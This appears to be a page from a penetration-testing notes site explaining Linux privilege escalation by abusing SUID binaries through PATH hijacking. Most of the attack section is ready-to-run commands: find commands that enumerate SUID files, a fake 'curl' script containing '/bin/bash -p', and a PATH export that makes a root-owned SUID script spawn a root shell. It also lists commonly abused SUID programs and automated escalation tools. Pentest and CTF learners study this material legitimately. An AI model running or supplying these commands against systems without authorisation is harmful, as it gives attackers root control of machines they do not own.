Path Variable Manipulation

What is SUID, SGID, and Sticky bits?

Search system for types of files with SUID bits

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Verify file has SUID bit

ls -l /usr/file/test
# Example Output:
# -rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/file/test

Example of exploit

We find a script that has SUID bit, which runs curl upon call. Create a binary called curl that gives you a bash shell, then modify the user's PATH to use your created curl which running the script will give you a root bash shell.

# Verify file has SUID bit
ls -l /usr/bin/script
# Output:
# -rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/script

# Create binary called curl
echo "/bin/bash -p" > /home/user/curl
chmod +x /home/user/curl

#Modify $PATH
echo $PATH
export PATH=/home/user:$PATH
echo $PATH

# Running exploit
/usr/bin/script

What are typical SUID files? (not cp)

Research against https://gtfobins.github.io/ to find a vulnerable service. You could also use LinEnum or LinPeas to automate Piv Esc.

Common SUID to Priv Esc:

Nmap
Vim
find
Bash
More
Less
Nano
cp

PreviousLinux Priv Escalate NextSystemctl

Last updated 3 years ago